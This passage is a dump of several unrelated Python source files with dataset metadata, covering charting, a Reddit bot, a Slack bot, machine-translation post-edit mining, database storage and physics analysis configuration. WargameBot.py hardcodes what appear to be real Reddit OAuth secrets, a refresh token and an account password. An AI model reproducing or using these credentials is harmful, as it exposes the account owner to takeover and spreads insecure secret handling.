inplace=True)\n return df\n\n @staticmethod\n def get_rsi_timeseries(prices, n=14):\n # RSI = 100 - (100 / (1 + RS))\n # where RS = (Wilder-smoothed n-period average of gains / Wilder-smoothed n-period average of -losses)\n # Note that losses above should be positive values\n # Wilder-smoothing = ((previous smoothed avg * (n-1)) + current value to average) / n\n # For the very first \"previous smoothed avg\" (aka the seed value), we start with a straight average.\n # Therefore, our first RSI value will be for the n+2nd period:\n # 0: first delta is nan\n # 1:\n # ...\n # n: lookback period for first Wilder smoothing seed value\n # n+1: first RSI\n\n # First, calculate the gain or loss from one price to the next. 
The first value is nan so replace with 0.\n deltas = (prices - prices.shift(1)).fillna(0)\n\n # Calculate the straight average seed values.\n # The first delta is always zero, so we will use a slice of the first n deltas starting at 1,\n # and filter only deltas > 0 to get gains and deltas < 0 to get losses\n avg_of_gains = deltas[1:n + 1][deltas > 0].sum() / n\n avg_of_losses = -deltas[1:n + 1][deltas < 0].sum() / n\n\n # Set up pd.Series container for RSI values\n rsi_series = pd.Series(0.0, deltas.index)\n\n # Now calculate RSI using the Wilder smoothing method, starting with n+1 delta.\n up = lambda x: x if x > 0 else 0\n down = lambda x: -x if x < 0 else 0\n i = n + 1\n for d in deltas[n + 1:]:\n avg_of_gains = ((avg_of_gains * (n - 1)) + up(d)) / n\n avg_of_losses = ((avg_of_losses * (n - 1)) + down(d)) / n\n if avg_of_losses != 0:\n rs = avg_of_gains / avg_of_losses\n rsi_series[i] = 100 - (100 / (1 + rs))\n else:\n rsi_series[i] = 100\n i += 1\n\n return rsi_series\n\n\n def main_chart(self):\n fig, axes = plt.subplots(nrows=3, ncols=1, gridspec_kw={'height_ratios': [3, 1, 1]})\n fig.suptitle(f\"{self.symbol} {self.tf}\", fontsize=16)\n ax_r = axes[0].twinx()\n mc = mpf.make_marketcolors(up='#00e600', down='#ff0066',\n edge={'up': '#00e600', 'down': '#ff0066'},\n wick={'up': '#00e600', 'down': '#ff0066'},\n volume={'up': '#808080', 'down': '#4d4d4d'},\n ohlc='black')\n s = mpf.make_mpf_style(marketcolors=mc)\n ax_r.set_alpha(0.01)\n axes[0].set_zorder(2)\n for ax in axes:\n ax.set_facecolor((0, 0, 0, 0))\n ax_r.set_zorder(1)\n\n axes[1].set_ylabel('RSI')\n axes[1].margins(x=0, y=0.1)\n axes[0].margins(x=0, y=0.05)\n axes[2].set_ylabel('MACD')\n ax_r.set_ylabel('')\n ax_r.yaxis.set_visible(False)\n axes[2].margins(0, 0.05)\n axes[0].xaxis.set_visible(False)\n axes[1].xaxis.set_visible(False)\n\n axes[0].yaxis.tick_left()\n axes[0].yaxis.set_label_position('right')\n axes[1].yaxis.set_label_position('right')\n axes[2].yaxis.set_label_position('right')\n plt.tight_layout()\n fig.autofmt_xdate()\n self.df.volume = self.df.volume.div(2)\n addplot_200 = mpf.make_addplot(self.df['ema_200'], type='line', ax=axes[0], width=1, color='#ff0066')\n addplot_50 = mpf.make_addplot(self.df['ema_50'], type='line', ax=axes[0], width=1, color='#00e600')\n addplot_trades = mpf.make_addplot(self.trades_series(self.symbol), type='scatter', ax=axes[0], width=5, color='#fff')\n mpf.plot(self.df, ax=axes[0], type=\"candle\", style=s, volume=ax_r, ylabel='', addplot=[addplot_200, addplot_50])\n max_vol = max({y for index, y in self.df.volume.items()})\n ax_r.axis(ymin=0, ymax=max_vol * 3)\n self.df['rsi'].plot(ax=axes[1], legend=False, use_index=True, sharex=axes[0], color='#00e600')\n self.df['MACD_12_26_9'].plot(ax=axes[2], legend=False, use_index=True, sharex=axes[0], color='#00e600')\n self.df['MACDs_12_26_9'].plot(ax=axes[2], legend=False, use_index=True, sharex=axes[0], color='#ff0066')\n axes[2].axhline(0, color='gray', ls='--', linewidth=1)\n axes[1].axhline(70, color='gray', ls='--', linewidth=1)\n axes[1].axhline(30, color='gray', ls='--', linewidth=1)\n if self.entry:\n tp = self.entry + self.entry * self.tp if self.direction else self.entry - self.entry * self.tp\n sl = self.entry - self.entry * self.sl if self.direction else self.entry + self.entry * self.sl\n tp_color = 'red' if self.direction else 'green'\n sl_color = 'red' if not self.direction else 'green'\n axes[0].axhline(self.entry, color='yellow', ls=\"--\", linewidth=.5)\n axes[0].axhline(tp, color=tp_color, ls=\"--\", linewidth=.5)\n 
axes[0].axhline(sl, color=sl_color, ls=\"--\", linewidth=.5)\n axes[2].set_xlabel('')\n img = io.BytesIO()\n FigureCanvas(fig).print_png(img)\n plot_url = base64.b64encode(img.getvalue()).decode()\n fig.savefig('plot.png', format='png')\n plt.close(fig)\n return plot_url\n\n # def plot_rsi_div(self):\n # rsi_array = np.array(self.df['rsi'].tail(20).array)\n # close_array = np.array(self.df['close'].tail(20).array)\n # rsi_peaks, _ = scipy.signal.find_peaks(rsi_array)\n # rsi_troughs, _ = scipy.signal.find_peaks(-rsi_array)\n # fig, (ax1, ax2) = plt.subplots(2, sharex=True)\n # fig.suptitle(f'{self.symbol} RSI Divergence {self.tf}')\n # ax1.set_ylabel('Close')\n # ax2.set_ylabel('RSI')\n # ax2.axhline(70, color='gray', ls='--')\n # ax2.axhline(30, color='gray', ls='--')\n # ax1.xaxis.set_visible(False)\n # ax2.xaxis.set_visible(False)\n # ax1.plot(close_array)\n # ax2.plot(rsi_array, color='green')\n # ax1.plot(rsi_peaks, close_array[rsi_peaks], '.', color=\"#ff0066\")\n # ax2.plot(rsi_peaks, rsi_array[rsi_peaks], '.', color=\"#ff0066\")\n # ax1.plot(rsi_troughs, close_array[rsi_troughs], '.', color=\"#00e600\")\n # ax2.plot(rsi_troughs, rsi_array[rsi_troughs], '.', color=\"#00e600\")\n # _, new_close_array, new_rsi_array, indices = self.rsi_divergence()\n # if len(close_array) != len(new_close_array):\n # ax1.plot(indices, new_close_array, color=\"#ff0066\")\n # ax2.plot(indices, new_rsi_array, color=\"#ff0066\")\n # img = io.BytesIO()\n # fig.savefig(img, format='png')\n # img.seek(0)\n # plot_url = base64.b64encode(img.getvalue()).decode()\n # plt.close()\n # return plot_url\n\n def plot_charts(self):\n self.main_chart()\n # self.plot_rsi_div()\n\n\nif __name__ == '__main__':\n c = Charts('SNXUSDT', '15m')\n print('plotting charts')\n c.plot_charts()\n print('done')\n sys.exit()\n # print(Charts('SNXUSDT', '15m').trades_series('SNXUSDT'))\n","sub_path":"analysis/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"588993880","text":"app_ua = 'Script that helps users and get information about Wargame on the /r/Wargame subreddit, made by /u/MatthewBetts'\napp_id = 'IQ6psQuqn9oZQg'\napp_secret = 'm-OZWaMw1ZKxLRx5ZYTPfu5vbEg'\napp_uri = 'https://127.0.0.1:65010/authorize_callback'\napp_scopes = 'account creddits edit flair history identity livemanage modconfig modcontributors modflair modlog modothers modposts modself modwiki mysubreddits privatemessages read report save submit subscribe vote wikiedit wikiread'\napp_account_code = 'rLzgSz3xKQgFwH0kg5f9It9EsY0'\napp_refresh = '43384807--w0i40wcH0VwYFsVhn3rPR-5oUY' \n\nimport praw\nimport time\nimport sqlite3\n\nUSERAGENT = 'Script that helps users and get information about Wargame on the /r/Wargame subreddit, made by /u/MatthewBetts'\nUSERNAME = 'WargameBot'\nPASSWORD = 'be565f2b2236412'\nSUBREDDIT = \"wargame\"\nMAXPOSTS = 10\n\nSETPHRASES = [\"I'm a new player\",\"new here\",\"\"]\nSETRESPONSE = \"Hi, you've found out my test phrase! 
Well done!\"\n\nWAIT = 20\n \nprint('Opening Database')\nsql = sqlite3.connect('sql.db')\ncur = sql.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS oldposts(ID TEXT)')\nsql.commit()\n\n#def login():\nprint('Logging in...')\nr = praw.Reddit(app_ua)\nr.set_oauth_app_info(app_id, app_secret, app_uri)\nr.refresh_access_information(app_refresh)\nprint('Logged in.')\n#return r\n\t\ndef reply():\n print('Fetching subreddit ' + SUBREDDIT)\n subreddit = r.get_subreddit(SUBREDDIT)\n print('Fetching Comments')\n comments = subreddit.get_comments(limit=MAXPOSTS)\n for comment in comments:\n cur.execute('SELECT * FROM oldposts WHERE ID=?', [comment.id])\n if not cur.fetchone():\n try:\n cauthor = comment.author.name\n if cauthor.lower() != USERNAME.lower():\n cbody = comment.body.lower()\n if any(key.lower() in cbody for key in SETPHRASES):\n print('Replying to /u/' + cauthor)\n comment.reply(SETRESPONSE)\n except AttributeError:\n pass\t \n cur.execute('INSERT INTO oldposts VALUES(?)', [comment.id])\n sql.commit()\n\t\t\t\t\t\nwhile True:\n reply()\n print('Waiting 20 seconds')\n time.sleep(WAIT)\n#f.close()\n \n\t#with open('Unit_File.csv', 'r') as f:\n # for comment in comments:\n # cbody = comment.body.lower()\n # for row in csv.reader(f):\n # if cbody == row[1]:\n # comment.reply(row[1])\n # break\n # else: # no match\n # print('No match for /u/' + cauthor)\n\t\n#with open('RedditBot.csv', 'w') as csvfile:\n # fieldnames = ['Unit', 'Image_link']\n#with open('RedditBot.csv', newline='') as f:\n# reader = csv.reader(f)\n # for row in reader:\n # if comment == :\n#\t\tprint(row)\n\t\n#sqlite3 Wargame_Units.db\n\n#CREATE DATABASE Wargame_Units;\n#CREATE TABLE Units\n#(\n#UnitName varchar(255),\n#ImgurLink varchar(255),\n#);\n#BULK INSERT TmpStList FROM 'c:\\RedditBot\\RedditBot.txt' WITH (FIELDTERMINATOR = ',') \n#SELECT IMGUR_LINK FROM Units\n#WHERE UnitName=WHATEVER_NAME_THEY_ENTERED;\t","sub_path":"WargameBot.py","file_name":"WargameBot.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"175874847","text":"\"\"\"\n data_set : the full data set (including the label feature)\n feature_names : the feature names\n feature_type : the feature types ('categorical', 'numerical', 'numerical', 'label')\n -> since this feature set has been discretized, everything except the class is treated as categorical\n\n data upload -> preprocessing -> CBA rule extraction -> rule output\n\"\"\"\nimport cba.cba_rg as cba_rg\nimport pandas as pd\n\nprint(\"\\nData set Upload\")\nTD_misuse_data = pd.read_csv('F:/data/ADD/201023_data/disc_data.csv')\nTD_misuse_data = TD_misuse_data.to_numpy()\n\nprint(\"\\nCBA - Make Rule\")\nminsup = 0.1\nminconf = 0.1\ncars = cba_rg.rule_generator(TD_misuse_data, minsup, minconf)\n\nprint(\"\\nCARs:\")\ncars.print_rule()","sub_path":"201023_project/misuse_test.py","file_name":"misuse_test.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"624349545","text":"\"\"\"Exception type for non-existent argument-name accesses.\"\"\"\n\nfrom typing import Tuple\n\nfrom .base_argument_error import BaseArgumentError\nfrom ..generic_errors import AlmanacKeyError\n\n\nclass NoSuchArgumentError(BaseArgumentError, AlmanacKeyError):\n \"\"\"An exception type for resolutions of non-existent arguments.\"\"\"\n\n def __init__(\n self,\n *names: str\n ) -> None:\n if not names:\n msg = 'No such argument with specified name.'\n elif len(names) == 1:\n msg = f'No such argument with name {names[0]}.'\n elif len(names) == 2:\n msg = f'No arguments exist with the name 
{names[0]} or {names[1]}.'\n else:\n joined_names = ','.join(names[:-1]) + f', or {names[-1]}'\n msg = f'No arguments exist with the name {joined_names}.'\n\n super().__init__(msg)\n self._names = names\n\n @property\n def names(\n self\n ) -> Tuple[str, ...]:\n \"\"\"A tuple of the argument names that triggered this error.\"\"\"\n return self._names\n","sub_path":"almanac/errors/argument_errors/no_such_argument_error.py","file_name":"no_such_argument_error.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"474496949","text":"import argparse, pprint, re, csv\nfrom lib.edwf2 import EDWF\nfrom lib.phr_ex import phrase_extraction\nfrom lib.explain2_fast import getCorrespondences\n\n\"\"\"\n===================== Global arguments section =================================\n\"\"\"\n\nparser = argparse.ArgumentParser(description='Apertium translation parts')\nparser.add_argument('sourceLanguage', help='source language')\nparser.add_argument('targetLanguage', help='target language')\n\nparser.add_argument('source_input_file', help='Source text, input') \nparser.add_argument('mt_input_file', help='Hypothesis file, input')\nparser.add_argument('pe_input_file', help='Postedited output file, input')\nparser.add_argument('fmt', help='Fuzzy Match Threshold', type=float)\n\nparser.add_argument('-m', '--maxSourceLength', help='maximum length of whole-word subsegments (for source text)', type=int, default=5)\nparser.add_argument('-M', '--maxTranslationLength', help='maximum length of whole word subsegments (for translated text)', type=int, default=5)\nparser.add_argument('-d', '--directory', help='directory of Apertium language pair', default=None)\nparser.add_argument('-t', '--table', help='prints reference table of characters', action='store_true', default=False)\nparser.add_argument('-i', '--ignoreCase', help='ignore case in analyses (use lower always)', action='store_true', default=False)\nparser.add_argument('-o', '--output', help='output file', default=None)\n\nargs = parser.parse_args()\n\n\"\"\"\n===================== Main code section =================================\n\"\"\"\n\n\ndef calculate_distance(source, mt, pe):\n source_tuple = tuple((source.strip()).split())\n mt_tuple = tuple((mt.strip()).split())\n pe_tuple = tuple((pe.strip()).split())\n\n ed_algorithm = EDWF(mt_tuple, pe_tuple)\n distance = ed_algorithm.get_distance() * 1.0\n\n return ed_algorithm, distance, mt_tuple, pe_tuple\n\n\ndef create_opA(mt, pe, alignment):\n opA = set()\n\n for pair, mt, pe in phrase_extraction(mt.strip(), pe.strip(), alignment):\n print(pair, mt, pe)\n opA.add((mt.strip(), pe.strip()))\n\n return opA\n\n\ndef create_opB(correspondences):\n opB = set()\n\n for s, t, i, j, k, l in correspondences:\n t = re.sub(\"\\s+\", \" \", t)\n opB.add((s, t))\n\n return opB\n\n\ndef find_intersection(opA, opB):\n posteditops = []\n\n for s, t in opB:\n for hyp, ref in opA:\n if t == hyp:\n posteditops.append((s, t, ref))\n\n return posteditops\n\n\ndef extract_operations(ed_algorithm, source, mt, pe):\n alignment = ed_algorithm.get_alignment()\n print(alignment)\n\n opA = create_opA(mt, pe, alignment)\n #print(opA)\n\n correspondences = getCorrespondences(\n args.sourceLanguage,\n args.targetLanguage,\n args.ignoreCase,\n args.maxSourceLength,\n args.directory,\n args.maxTranslationLength,\n source.strip())\n\n opB = create_opB(correspondences)\n\n posteditops = find_intersection(opA, opB)\n\n return posteditops\n\n\ndef 
write_operations(posteditops):\n if args.output:\n with open(args.output, 'w', encoding='utf-8') as file:\n for source, mt, pe in posteditops:\n file.write(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"\\n\" % (source, mt, pe))\n else:\n for source, mt, pe in posteditops:\n print(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"\\n\" % (source, mt, pe))\n\n\ndef main():\n posteditops = []\n\n source_input = open(args.source_input_file, \"r\")\n mt_input = open(args.mt_input_file, \"r\")\n pe_input = open(args.pe_input_file, \"r\")\n\n #print(source_input)\n\n for source, mt, pe in zip(source_input, mt_input, pe_input):\n ed_algorithm, distance, mt_tuple, pe_tuple = calculate_distance(source, mt, pe)\n #print(source, mt, pe)\n\n if 1.0 - distance / max(len(mt_tuple), len(pe_tuple)) > 1.0 * args.fmt:\n try:\n posteditops += extract_operations(ed_algorithm, source, mt, pe)\n except:\n print(source, mt, pe)\n \n write_operations(posteditops)\n\n source_input.close()\n mt_input.close()\n pe_input.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"automatic_postediting/cleaned_learn_postedits.py","file_name":"cleaned_learn_postedits.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"32418240","text":"\"\"\"Main file for analyzing and plotting molecular dynamics simulation data.\n\nThis program reads in a set of molecular geometry and energy data output by a\nmolecular simulation and computes and plots resulting ensemble data.\n\nNo guarantees are made that the results of this program are correct and the\nauthor assumes no liability for their reliability.\n\"\"\"\n\nimport mmlib\n\n__author__ = 'Trent M. Parker'\n__email__ = 'tmpchemistry@gmail.com'\n__status__ = 'Prototype'\n__date__ = '2017-02-22'\n\nif __name__ == '__main__':\n # check input syntax\n infile_name = mmlib.fileio.ValidateInput(__file__)\n\n # read in ensemble geometry and energy data\n ana = mmlib.analyze.Analysis(infile_name)\n\n # compute and plot ensemble properties\n ana.RunAnalysis()\n","sub_path":"scripts/molecular_mechanics/ana.py","file_name":"ana.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"142005686","text":"# -*- coding: utf-8 -*-\n\n#in project directory, run\n#celery -A proj worker --app=celery_app.celery_app\n\nfrom celery import Celery\n\nbroken_url = 'redis://127.0.0.1:6379/0'\nbackend = broken_url\n\ncelery_app = Celery('proj', broker=broken_url, backend=backend)\ncelery_app.conf.CELERY_TASK_SERIALIZER = 'json'\n\n\nif __name__ == \"__main__\":\n celery_app.start()","sub_path":"celery_app.py","file_name":"celery_app.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
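A hedged aside on the celery_app.py record above: the file only constructs the app, so as a usage illustration a task would typically be declared and queued like this (hypothetical task name, not in the original file):

# requires a worker started as shown in the record's own comment
@celery_app.task
def add(x, y):
    return x + y

result = add.delay(2, 3)       # enqueue on the Redis broker configured above
print(result.get(timeout=10))  # -> 5, once a worker has picked it up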
{"seq_id":"49254039","text":"#!/usr/bin/python3\n\"\"\" SQL db \"\"\"\nfrom os import getenv\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom models.user import User\nfrom models.city import City\nfrom models.state import State\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nfrom models.base_model import Base\n\n\nclass DBStorage:\n \"\"\" db \"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n user = getenv('HBNB_MYSQL_USER')\n pwd = getenv('HBNB_MYSQL_PWD')\n host = getenv('HBNB_MYSQL_HOST')\n db = getenv('HBNB_MYSQL_DB')\n env = getenv('HBNB_ENV')\n\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'\n .format(user, pwd, host, db),\n pool_pre_ping=True)\n\n if env == \"test\":\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\" Show all class objects in DB storage or specified class \"\"\"\n if cls:\n objects = self.__session.query(cls).all()\n else:\n classes = [State, City] # , User, Place, Review, Amenity]\n objects = []\n for c in classes:\n objects += self.__session.query(c)\n return {\"{}.{}\".format(type(obj).__name__, obj.id): obj for obj in\n objects}\n\n def new(self, obj):\n \"\"\" Add the object to the current DB session \"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"Commit\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\" Delete object from current DB session \"\"\"\n if obj:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\" Reload all tables and session from the engine \"\"\"\n Base.metadata.create_all(self.__engine)\n self.__session = sessionmaker(bind=self.__engine,\n expire_on_commit=False)\n Session = scoped_session(self.__session)\n self.__session = Session()\n\n def close(self):\n \"\"\" Close Session \"\"\"\n self.__session.close()\n","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"410794313","text":"import subprocess\nimport calm_execute as calm\n\nclass Command(object):\n def __init__(self):\n self.commands = {\n \"apps\" : self.apps,\n \"build\" : self.build,\n \"delete\" :self.delete,\n \"help\" : self.help\n }\n\n def handle_command(self, user, command):\n response = \"<@\" + user + \">: \"\n command = command.split()\n\n if command[0] in self.commands:\n response += self.commands[command[0]](command)\n else:\n response += \"Sorry I don't understand the command: \" + command[0] + \". \" + self.help(command)\n\n return response\n\n def apps(self, command):\n response = calm.apps_list()\n myReturn = \"\"\n\n if len(response) > 0:\n for item in response:\n myReturn += \"{0}, \".format(item[\"name\"])\n\n myReturn = myReturn[:-2]\n myReturn = \"The running applications are: {0}\".format(myReturn)\n\n else:\n myReturn = \"No applications found. {}\".format(response)\n\n return myReturn\n\n def build(self, command):\n try:\n appName = command[2]\n appVar = command[3]\n cloud = command[4]\n except:\n return \"Sorry, not enough arguments.\"\n\n if command[1] == \"pet\":\n response = calm.create_pet(appName, appVar, cloud)\n\n elif command[1] == \"swarm\":\n response = calm.create_swarm(appName, appVar, cloud)\n\n else:\n return \"I'm sorry. That's an unknown application.\"\n\n if len(response) > 0:\n myReturn = response\n else:\n myReturn = \"Unable to build {0} on cloud {1}\".format(appName, cloud)\n\n return myReturn\n\n def delete(self, command):\n if len(command) < 2:\n return \"{} requires an app name.\".format(command[0])\n\n response = calm.delete(command[1])\n\n if len(response) > 0:\n myReturn = response\n else:\n myReturn = \"No applications found. 
{}\".format(response)\n\n return myReturn\n\n def help(self, command):\n response = \"I support the following commands:\\r\\n\"\n\n for command in self.commands:\n response += command + \"\\r\\n\"\n\n return response\n","sub_path":"python_slack_bot/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"208857513","text":"#!/usr/bin/python2.5\n#\n# Copyright 2008 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Custom template tags for base.html of the Pabla demo app.\"\"\"\n\n__author__ = 'Fred Wulff'\n\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp import template\n\n\n# Get the template Library\nregister = template.create_template_register()\n\n\n@register.inclusion_tag('user_link.html')\ndef render_user_link(current_uri):\n \"\"\"Renders a link that the user can use to log into or out of Google account.\n\n This is a custom tag since it's included in the header of virtually every\n page served by Pabla, and we don't want to force views to pass the user in\n the template context every time.\n\n Args:\n current_uri: the uri of the page currently being rendered\n\n Returns:\n A link that allows the user to log in or out.\n \"\"\"\n user = users.get_current_user()\n\n # Note: Here we return a dict that serves at the context for the\n # template indicated in the method decorator.\n if user is None:\n url = users.create_login_url(current_uri)\n return {'authenticated': False,\n 'url': url}\n else:\n url = users.create_logout_url(current_uri)\n return {'authenticated': True,\n 'username': user.nickname(),\n 'url': url}\n","sub_path":"python/app_gallary/pabla/templatetags/basetags.py","file_name":"basetags.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"136949579","text":"from OSUT3Analysis.Configuration.configurationOptions import *\nfrom DisappTrks.StandardAnalysis.miniAODV2Samples import *\nimport copy \n\nconfig_file = \"protoConfig_cfg.py\"\n\nintLumi = 2590.0 # https://cmshead.mps.ohio-state.edu:8080/DisappearingTracks/595\n\nInputCondorArguments = {'request_memory': '2048MB', 'request_cpus': '1'}\n\ndatasetsBkgd = [\n 'DYJetsToLL',\n 'ZJetsToNuNu',\n 'VV',\n 'SingleTop',\n 'TTJets',\n 'WJetsToLNu_HT',\n # 'WJetsToLNu',\n]\n\ndatasetsData = [\n 'MET_2015D',\n]\n\ndatasetsSig = [\n 'AMSB_chargino_100GeV_10cm',\n 'AMSB_chargino_100GeV_100cm',\n 'AMSB_chargino_100GeV_1000cm',\n\n 'AMSB_chargino_200GeV_10cm',\n 'AMSB_chargino_200GeV_100cm',\n 'AMSB_chargino_200GeV_1000cm',\n\n 'AMSB_chargino_300GeV_10cm',\n 'AMSB_chargino_300GeV_100cm',\n 'AMSB_chargino_300GeV_1000cm',\n\n 'AMSB_chargino_400GeV_10cm',\n 'AMSB_chargino_400GeV_100cm',\n 'AMSB_chargino_400GeV_1000cm',\n\n 'AMSB_chargino_500GeV_10cm',\n 'AMSB_chargino_500GeV_100cm',\n 'AMSB_chargino_500GeV_1000cm',\n\n 'AMSB_chargino_600GeV_10cm',\n 
'AMSB_chargino_600GeV_100cm',\n 'AMSB_chargino_600GeV_1000cm',\n\n 'AMSB_chargino_700GeV_10cm',\n 'AMSB_chargino_700GeV_100cm',\n 'AMSB_chargino_700GeV_1000cm',\n]\n\ndatasetsSigShort = copy.deepcopy(datasetsSig) \n\ndatasetsSigVeryShort = [\n 'AMSB_chargino_500GeV_10cm',\n 'AMSB_chargino_500GeV_100cm',\n 'AMSB_chargino_500GeV_1000cm',\n]\n\n################################################################################\n# add the lifetime reweighted samples\n################################################################################\nnew_datasetsSig = []\nfor dataset0 in datasetsSig:\n if not re.match (r'AMSB_chargino_[^_]*GeV_[^_]*cm', dataset0):\n continue\n mass = re.sub (r'AMSB_chargino_([^_]*)GeV_[^_]*cm', r'\\1', dataset0)\n ctau0 = float (re.sub (r'AMSB_chargino_[^_]*GeV_([^_]*)cm', r'\\1', dataset0))\n for i in range (2, 10):\n ctau = ctauP = 0.1 * i * ctau0\n if int (ctau) * 10 == int (ctau * 10):\n ctau = ctauP = str (int (ctau))\n else:\n ctau = ctauP = str (ctau)\n ctauP = re.sub (r'\\.', r'p', ctau)\n dataset = 'AMSB_chargino_' + mass + 'GeV_' + ctauP + 'cm'\n\n new_datasetsSig.append (dataset)\n\ndatasetsSig.extend (new_datasetsSig)\n################################################################################\n\ndatasets = datasetsBkgd + datasetsData + datasetsSig\n\ncomposite_dataset_definitions[\"allBkgd\"] = datasetsBkgd\n\ncomposite_dataset_definitions[\"WW\"] = [\n 'WWToLNuQQ',\n 'WWToLNuLNu',\n]\n\ncomposite_dataset_definitions[\"VG\"] = [\n 'WG',\n 'ZG',\n]\n\ncomposite_dataset_definitions[\"VV\"] = [\n 'WWToLNuQQ',\n 'WWToLNuLNu',\n 'WZ',\n 'ZZ', \n 'WG',\n 'ZG',\n]\n\ntypes[\"WW\"] = \"bgMC\"\ntypes[\"WZ\"] = \"bgMC\"\ntypes[\"ZZ\"] = \"bgMC\"\ntypes[\"VG\"] = \"bgMC\"\ntypes[\"VV\"] = \"bgMC\"\ntypes[\"allBkgd\"] = \"bkMC\" \n\ncolors[\"WW\"] = 390\ncolors[\"WZ\"] = 393\ncolors[\"ZZ\"] = 397\ncolors[\"VG\"] = 400\ncolors[\"VV\"] = 393\ncolors[\"allBkgd\"] = 601\n\nlabels[\"DYJetsToLL_50\"] = \"Z#rightarrowl^{+}l^{-}\"\nlabels[\"DYJetsToNuNu\"] = \"Z#rightarrow#nu#bar{#nu}\"\nlabels[\"WJetsToLNu\"] = \"W#rightarrowl#nu\"\nlabels[\"WW\"] = \"WW\"\nlabels[\"WZ\"] = \"WZ\"\nlabels[\"ZZ\"] = \"ZZ\"\nlabels[\"VG\"] = \"V#gamma\"\nlabels[\"VV\"] = \"Diboson\"\nlabels[\"allBkgd\"] = \"Total bkgd\" \n","sub_path":"StandardAnalysis/test/localConfig.py","file_name":"localConfig.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"134615623","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tues Apr 18 11:35:49 2018\n\n@author: celinede\n\"\"\"\n\ndef selectRegions(inMat,inLut,inRegions,outMat):\n import pandas as pd\n import numpy as np\n\n lut = np.genfromtxt(inLut,dtype=str,delimiter='\\n')\n\n if len(lut)==16:\n lut_d = {0:lut[0],1:lut[1],2:lut[2],3:lut[3],4:lut[4],5:lut[5],6:lut[6],7:lut[7],8:lut[8],\n 9:lut[9],10:lut[10],11:lut[11],12:lut[12],13:lut[13],14:lut[14],15:lut[15]}\n else:\n print('Sorry, I don\\'t know how to handle that ...')\n\n conMat = pd.DataFrame.from_csv(inMat,header=None,sep=' ',index_col=None)\n conMat = conMat.rename(lut_d,axis='columns')\n conMat = conMat.rename(lut_d,axis='rows')\n\n conMat_selected = conMat[inRegions]\n conMat_selected = conMat_selected.loc[inRegions]\n\n conMat_selected.to_csv(outMat,index=None,header=None,sep=' 
')\n","sub_path":"scripts/dataprocessing/selectRegionsInConMat.py","file_name":"selectRegionsInConMat.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"602118854","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script will parse through multiple GFF3 files and pull the alleles of each.\nIt expects a file as input with each line in the file being tab-delimited \nwhere the first column is the type (either reference or isolate), the second\ncolumn is the GFF3 file, the third column is the FASTA that correlates to \nthe GFF3 file, and the fourth column is the name/prefix to designate these files to. \nWhile the FASTA file is not used by this script, it is used by downstream\nscripts so formatting this file like this allows for this single file \nto be used as input for all subsequent scripts. \n\nThe input should look like this (MUST start with whichever you want to be the reference): \n reference /path/to/ref.gff3 /path/to/ref.fasta name_of_ref\n isolate /path/to/iso1.gff3 /path/to/iso1.fasta name_of_iso1\n isolate /path/to/iso2.gff3 /path/to/iso2.fasta name_of_iso2\n\n*** It is VERY important that values in the name_of_* column do not contain periods ***\n*** This is to guarantee correct mapping later on in the pipeline ***\n\nNote there can only be one reference as this is what all other alleles will map\nto. The output will be another TSV file with the first column being the reference\nID, the second column being source/location of this gene, and the third column\ncontains the start-stop coordinates for the gene. Subsequent columns will \nhave the isolates that follow this same pattern. \n\nThe output will look like this:\n ref_id_0001 ref_loc 1-8888 iso1.ref_id_0001 iso1_loc 2-7999 iso2.ref_id_0001 iso2_loc 3-8000\n\n Input:\n 1. Path to a TSV list for references and isolates described above\n 2. 